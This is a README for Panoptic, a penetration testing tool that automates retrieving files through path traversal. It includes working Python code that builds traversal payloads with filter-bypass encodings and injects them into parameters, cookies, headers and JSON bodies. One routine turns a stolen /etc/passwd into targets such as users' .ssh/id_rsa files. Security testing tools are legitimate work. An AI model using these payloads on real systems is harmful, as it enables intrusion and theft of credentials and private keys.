# Panoptic

Panoptic is an open source penetration testing tool that automates the search for, and retrieval of, common log and configuration files through path traversal vulnerabilities.

## Features

- Async concurrent scanning with a configurable worker pool (`--concurrency`)
- Automatic discovery of common log and configuration files via parameter-based, path-based, POST, cookie, header, and JSON body injection
- `FUZZ` marker for arbitrary injection points: place `FUZZ` in any `--header` or `--data` value
- Base64 encoding for endpoints that decode file paths (`--base64`)
- Automatic OS detection, with the option to restrict further scans to the detected OS
- Heuristic response comparison with status code filtering to reduce false positives
- Dynamic case injection: parse `/etc/passwd` for home directory files and `mysql-bin.index` for binlog files
- Multiple output formats: text (rich), JSON, CSV (`--output-format`)
- Resume/checkpoint support for long-running scans (`--resume-file`)
- TOML config files for persistent settings (`--config`)
- Multiple traversal bypass techniques: prefixes, postfixes, multiplier, slash replacement, double encoding
- HTTP/HTTPS and SOCKS4/SOCKS5 proxy support with validation
- Random or custom User-Agent, cookie, and header support
- Credential redaction in banner and log output
- Self-update with remote URL verification (`--update`)
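The bypass techniques and the dynamic `/etc/passwd` case above are easiest to see in code. The following is an added example, not Panoptic's own implementation: it builds traversal payload variants (hop count as the multiplier, prefix and postfix strings, separator replacement, double percent-encoding and base64) and expands a retrieved `/etc/passwd` into per-user file paths. The function and parameter names, the candidate file list and the sample `passwd` content are constructed for this illustration; only `--prefix` and `--base64` correspond to flags shown on this page.

```python
"""Added example (not Panoptic's own code): traversal payload variants and
dynamic case expansion from a retrieved /etc/passwd."""
import base64
import itertools


def _pct(s: str, chars: str = "./\\%") -> str:
    """Percent-encode only the characters traversal filters key on.
    urllib.parse.quote never encodes '.', so a small custom encoder is used."""
    return "".join(f"%{ord(c):02X}" if c in chars else c for c in s)


def build_payloads(file_path, depth=4, prefixes=("",), postfixes=("",),
                   separators=("/",), double_encode=False, b64=False):
    """Yield one payload per combination of prefix, postfix and separator.

    depth       number of '..<sep>' hops (the multiplier idea)
    prefixes    strings prepended to the traversal, e.g. '....//' survives a
                filter that strips '../' exactly once
    postfixes   strings appended, e.g. '%00' for null-byte truncation
    separators  '/' for *NIX, '\\' for Windows, or an encoded form such as '%2F'
    """
    rel = file_path.lstrip("/\\")
    for prefix, postfix, sep in itertools.product(prefixes, postfixes, separators):
        hops = f"..{sep}" * depth
        payload = f"{prefix}{hops}{rel.replace('/', sep)}{postfix}"
        if double_encode:
            # first pass: ../ -> %2E%2E%2F ; second pass re-encodes the '%' -> %252E%252E%252F
            payload = _pct(_pct(payload))
        if b64:
            # for endpoints that base64-decode the file parameter (cf. --base64)
            payload = base64.b64encode(payload.encode()).decode()
        yield payload


def home_dir_targets(passwd_text, candidates=(".bash_history", ".ssh/id_rsa")):
    """Turn the content of a retrieved /etc/passwd into per-user paths to try next.
    Accounts without an absolute home directory or with a non-login shell are
    skipped, which drops most system accounts."""
    targets = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue  # comment or malformed line
        home, shell = fields[5], fields[6]
        if not home.startswith("/") or shell.endswith(("nologin", "false")):
            continue
        for name in candidates:
            targets.append(f"{home.rstrip('/')}/{name}")
    return targets


# Constructed sample of what a successful /etc/passwd retrieval might return.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/zsh
"""

if __name__ == "__main__":
    for p in build_payloads("/etc/passwd", depth=3, prefixes=("", "....//"),
                            separators=("/", "\\"), double_encode=True):
        print(p)
    print(home_dir_targets(SAMPLE_PASSWD))
```

Each variant should be sent and compared against the baseline response, as the heuristic comparison in the feature list describes; generating the full product of prefixes, postfixes and separators is cheap, but sending it is not, so restrict the separator set once the OS has been detected.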
## Requirements

- Python 3.10+
- Dependencies: `httpx[socks]`, `rich`, `rich-argparse`
## Installation

```bash
git clone https://github.com/lightos/Panoptic.git
cd Panoptic
pip install -e .
```

For development:

```bash
pip install -e ".[dev]"
```

## Usage

```bash
# Basic scan of a GET parameter
panoptic --url "http://target/include.php?file=test.txt"

# Choose which parameter to inject when the URL has several
panoptic --url "http://target/include.php?file=test.txt&id=1" \
    --param file

# POST form body
panoptic --url "http://target/include.php" \
    --data "file=test.txt&id=1" --param file

# Path-based injection (the file name is part of the URL path)
panoptic --url "http://target/view.php/test.txt" --path-based

# Endpoint that base64-decodes the file path
panoptic --url "http://target/load.php?file=dGVzdC50eHQ=" \
    --base64 --auto

# Cookie value, custom header and JSON body via the FUZZ marker
panoptic --url "http://target/page.php" \
    --header "Cookie: lang=FUZZ" --auto
panoptic --url "http://target/api/load" \
    --data '{"file":"FUZZ"}' --auto
panoptic --url "http://target/page.php" \
    --header "X-Template: FUZZ" --auto

# File extension supplied in a separate parameter
panoptic --url "http://target/view.php?file=test&type=txt" \
    --param file --ext-param type

# Traversal prefix for filter bypass
panoptic --url "http://target/filtered.php?file=test.txt" \
    --prefix "....//....//....//....//"

# Restrict the scan by OS and file type, or to one piece of software
panoptic --url "http://target/include.php?file=test.txt" \
    --os "*NIX" --type conf
panoptic --url "http://target/include.php?file=test.txt" \
    --software PostgreSQL

# JSON output with a checkpoint file for resuming
panoptic --url "http://target/include.php?file=test.txt" \
    --output-format json --output-file results.json \
    --resume-file scan.checkpoint

# Through a SOCKS5 proxy, accepting an invalid TLS certificate
panoptic --url "https://target/include.php?file=test.txt" \
    --proxy "socks5://127.0.0.1:9050" --invalid-ssl

# List the known software, categories and operating systems
panoptic --list software
panoptic --list category
panoptic --list os

# Automatic mode, all software versions, 8 workers
panoptic --url "http://target/include.php?file=test.txt" \
    --auto --all-versions --concurrency 8
```

## FUZZ marker

Place `FUZZ` anywhere in `--header` or `--data` values to mark the injection point. Panoptic replaces `FUZZ` with each file path during scanning. This enables testing injection points that `--param` can't reach:

| Injection Type | Example |
|---|---|
| Cookie value | `--header "Cookie: theme=FUZZ"` |
| Custom header | `--header "X-Include: FUZZ"` |
| JSON body | `--data '{"template":"FUZZ"}'` |
| Nested value | `--header "Cookie: sid=abc; lang=FUZZ"` |

When `FUZZ` is present, `--param` is not required.
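The substitution described above, as an added example that is not Panoptic's own code: a path is placed either at every `FUZZ` marker in the headers and body, or, when no marker is present, into the named query or form parameter. The function names are constructed for this illustration, and the treatment of `--param` as "overwrite that field" is an assumption; the one detail worth copying is the JSON handling, where the body is re-serialised through `json` so that a Windows payload such as `..\..\windows\win.ini` reaches the server with its backslashes escaped rather than as a broken document.

```python
"""Added example (not Panoptic's own code): placing a traversal payload at a
FUZZ marker or into a selected parameter."""
import json
from urllib.parse import urlsplit, urlunsplit

FUZZ = "FUZZ"


def _walk(obj, path):
    """Replace FUZZ inside every string of a parsed JSON document."""
    if isinstance(obj, str):
        return obj.replace(FUZZ, path)
    if isinstance(obj, dict):
        return {k: _walk(v, path) for k, v in obj.items()}
    if isinstance(obj, list):
        return [_walk(v, path) for v in obj]
    return obj


def _set_param(query, name, value):
    """Overwrite one key in a query string or form body without re-encoding the
    other fields, so an already encoded payload is sent exactly as built."""
    out, found = [], False
    for item in query.split("&"):
        if not item:
            continue
        key, _, val = item.partition("=")
        if key == name:
            val, found = value, True
        out.append(f"{key}={val}")
    if not found:
        raise ValueError(f"parameter {name!r} not present")
    return "&".join(out)


def build_request(url, path, headers=None, data=None, param=None):
    """Return (url, headers, body) with `path` placed at the injection point.

    A FUZZ marker in any header or data value takes precedence; otherwise
    `param` names the query or form field to overwrite (assumed here to be
    what --param does).
    """
    headers = dict(headers or {})
    has_fuzz = any(FUZZ in v for v in headers.values()) or bool(data and FUZZ in data)
    if not has_fuzz and param is None:
        raise ValueError("no FUZZ marker and no parameter selected")

    body = data
    if has_fuzz:
        headers = {k: v.replace(FUZZ, path) for k, v in headers.items()}
        if data is not None and FUZZ in data:
            try:
                # JSON body: substitute in the parsed document and re-serialise,
                # which escapes backslashes and quotes in the payload correctly
                body = json.dumps(_walk(json.loads(data), path))
            except ValueError:
                body = data.replace(FUZZ, path)  # form-encoded or raw body
    elif data is not None:
        body = _set_param(data, param, path)  # POST form parameter
    else:
        parts = urlsplit(url)  # GET query parameter
        url = urlunsplit(parts._replace(query=_set_param(parts.query, param, path)))
    return url, headers, body


if __name__ == "__main__":
    print(build_request("http://target/api/load", "..\\..\\windows\\win.ini",
                        data='{"file":"FUZZ"}'))
    print(build_request("http://target/page.php", "../../etc/passwd",
                        headers={"Cookie": "sid=abc; lang=FUZZ"}))
```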
## Configuration

Panoptic supports TOML config files for persistent settings:

```bash
panoptic --url "http://target/include.php?file=test.txt" \
    --config ~/.config/panoptic/config.toml
```

Default config location: `~/.config/panoptic/config.toml`

```toml
[defaults]
concurrency = 8
verbose = true
automatic = true

[proxy]
url = "socks5://127.0.0.1:9050"

[headers]
user_agent = "Mozilla/5.0"
```

Priority: CLI args > config file > built-in defaults.
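The priority rule is simple to state but easy to get wrong: if the argument parser fills in its own defaults for flags that were never typed, those defaults silently override the config file. The following added example, which is not Panoptic's code, shows one way to honour "CLI args > config file > built-in defaults" with `argparse`. The built-in default values, the mapping of the `[defaults]`, `[proxy]` and `[headers]` sections onto flat setting names, and the flags other than `--concurrency`, `--auto` and `--proxy` are assumptions made for this illustration.

```python
"""Added example (not Panoptic's own code): merging settings with the
priority CLI args > config file > built-in defaults."""
import argparse

# Constructed built-in defaults; Panoptic's real defaults are not reproduced here.
BUILTIN_DEFAULTS = {
    "concurrency": 4,
    "verbose": False,
    "automatic": False,
    "proxy": None,
    "user_agent": None,
}


def flatten_config(cfg):
    """Map the TOML sections onto flat setting names. The section layout
    follows the sample config; the mapping itself is an assumption."""
    flat = dict(cfg.get("defaults", {}))
    if "url" in cfg.get("proxy", {}):
        flat["proxy"] = cfg["proxy"]["url"]
    if "user_agent" in cfg.get("headers", {}):
        flat["user_agent"] = cfg["headers"]["user_agent"]
    return flat


def parse_cli(argv):
    """Parse a handful of flags. argument_default=SUPPRESS is the important
    part: a flag that was not typed leaves no attribute on the namespace, so it
    cannot clobber a value the config file set."""
    p = argparse.ArgumentParser(argument_default=argparse.SUPPRESS)
    p.add_argument("--url", required=True)
    p.add_argument("--concurrency", type=int)
    p.add_argument("--verbose", action="store_true")
    p.add_argument("--auto", dest="automatic", action="store_true")
    p.add_argument("--proxy")
    p.add_argument("--user-agent", dest="user_agent")  # assumed flag name
    return vars(p.parse_args(argv))


def resolve_settings(cli, cfg):
    """Three successive dict updates give the stated priority order:
    later updates win, so CLI beats config, which beats the built-ins."""
    merged = dict(BUILTIN_DEFAULTS)
    merged.update(flatten_config(cfg))
    merged.update(cli)
    return merged


def load_config(path):
    """Read a TOML file with the standard-library parser (Python 3.11+)."""
    import tomllib
    with open(path, "rb") as fh:
        return tomllib.load(fh)


if __name__ == "__main__":
    import sys
    sample_cfg = {"defaults": {"concurrency": 8, "verbose": True},
                  "proxy": {"url": "socks5://127.0.0.1:9050"}}
    print(resolve_settings(parse_cli(sys.argv[1:]), sample_cfg))
```

Without `argument_default=argparse.SUPPRESS`, `vars(p.parse_args(...))` would contain `concurrency=None` and `verbose=False` for flags that were never given, and the final `update` would wipe out the config file's values.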
## Contributing

Contributions are welcome! Please open issues or pull requests on GitHub.

## License

This project is licensed under the MIT License. See the LICENSE file for details.

